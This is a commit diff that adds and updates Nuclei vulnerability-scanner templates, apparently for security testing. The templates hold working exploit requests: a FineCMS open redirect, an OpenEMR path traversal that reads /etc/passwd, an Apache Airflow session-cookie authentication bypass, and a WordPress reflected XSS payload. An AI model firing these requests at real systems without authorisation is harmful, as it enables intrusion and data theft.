up PoCs 2022-08-31

.github/build/linux.yml

@@ -16,7 +16,7 @@ builds:
       - linux
     goarch:
       - amd64
-#      - arm64
+      - arm64
 archives:
 - format: zip
 

config/nuclei-templates/cves/2008/CVE-2008-1061.yaml

@@ -11,6 +11,8 @@ info:
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
     - http://secunia.com/advisories/29099
+  classification:
+    cve-id: CVE-2008-1061
   tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
 
 requests:

config/nuclei-templates/cves/2015/CVE-2015-4127.yaml

@@ -11,6 +11,8 @@ info:
     - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
     - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
     - https://wordpress.org/plugins/church-admin/changelog/
+  classification:
+    cve-id: CVE-2015-4127
   tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
 
 requests:

config/nuclei-templates/cves/2017/CVE-2017-11586.yaml

@@ -0,0 +1,39 @@
+id: CVE-2017-11586
+
+info:
+  name: FineCms < 5.0.9 - Open redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
+  reference:
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11586
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2017-11586
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2017,redirect,finecms
+
+requests:
+  - raw:
+      - |
+        POST /index.php?s=member&c=login&m=index HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
+
+      - |
+        GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - 'Refresh:(.*)url=http:\/\/interact\.sh'

config/nuclei-templates/cves/2017/CVE-2017-11629.yaml

@@ -9,10 +9,14 @@ info:
   reference:
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
     - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2017-11629
+    cwe-id: CWE-79
   metadata:
-    verified: true
+    verified: "true"
   tags: cve,cve2017,xss,finecms
 
 requests:

config/nuclei-templates/cves/2019/CVE-2019-14530.yaml

@@ -0,0 +1,52 @@
+id: CVE-2019-14530
+
+info:
+  name: OpenEMR < 5.0.2 - Path Traversal
+  author: TenBird
+  severity: high
+  description: |
+    An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
+  reference:
+    - https://www.exploit-db.com/exploits/50037
+    - /~https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14530
+    - /~https://github.com/openemr/openemr/pull/2592
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-14530
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: lfi,authenticated,edb,cve,cve2019,openemr
+
+requests:
+  - raw:
+      - |
+        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
+
+      - |
+        GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: header
+        words:
+          - filename=passwd
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2020/CVE-2020-17526.yaml

@@ -0,0 +1,51 @@
+id: CVE-2020-17526
+
+info:
+  name: Apache Airflow < 1.10.14 - Authentication Bypass
+  author: piyushchhiroliya
+  severity: high
+  description: |
+    Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
+  reference:
+    - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
+    - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
+    - http://www.openwall.com/lists/oss-security/2020/12/21/1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2020-17526
+  metadata:
+    fofa-query: Apache Airflow
+    verified: "true"
+  tags: cve,cve2020,apache,airflow,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /admin/ HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /admin/ HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "DAG"
+          - "Recent Tasks"
+          - "Users"
+          - "SLA Misses"
+          - "Task Instances"
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "contains(body_1, 'Redirecting...')"
+          - "status_code_1 == 302"
+        condition: and

config/nuclei-templates/cves/2022/CVE-2022-2383.yaml

@@ -0,0 +1,39 @@
+id: CVE-2022-2383
+
+info:
+  name: Feed Them Social < 3.0.1 - Cross-Site Scripting
+  author: akincibor
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
+    - https://wordpress.org/plugins/feed-them-social/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
+  classification:
+    cve-id: CVE-2022-2383
+  metadata:
+    verified: true
+  tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src onerror=alert(document.domain)><br/>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/archibus-webcentral-panel.yaml

@@ -2,7 +2,7 @@ id: archibus-webcentral-panel
 
 info:
   name: Archibus Web Central Panel
-  author: righettod
+  author: righettod,PJBorah,Hardik-Rathod
   severity: info
   reference:
     - https://archibus.com/products/
@@ -16,6 +16,7 @@ requests:
     path:
       - '{{BaseURL}}'
       - '{{BaseURL}}/archibus/login.axvw'
+      - '{{BaseURL}}/archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp'
 
     redirects: true
     max-redirects: 2
@@ -28,8 +29,8 @@ requests:
 
       - type: word
         words:
+          - "Continue As a Guest"
           - "login"
-          - "Sign Out"
         condition: or
 
       - type: status

config/nuclei-templates/exposed-panels/icc-pro-login.yaml

@@ -0,0 +1,33 @@
+id: icc-pro-login
+
+info:
+  name: ICC Pro System Login
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/7980
+  metadata:
+    verified: true
+    shodan-query: title:"Login to ICC PRO system"
+  tags: panel,icc-pro,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Account/Login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Login to ICC PRO system</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200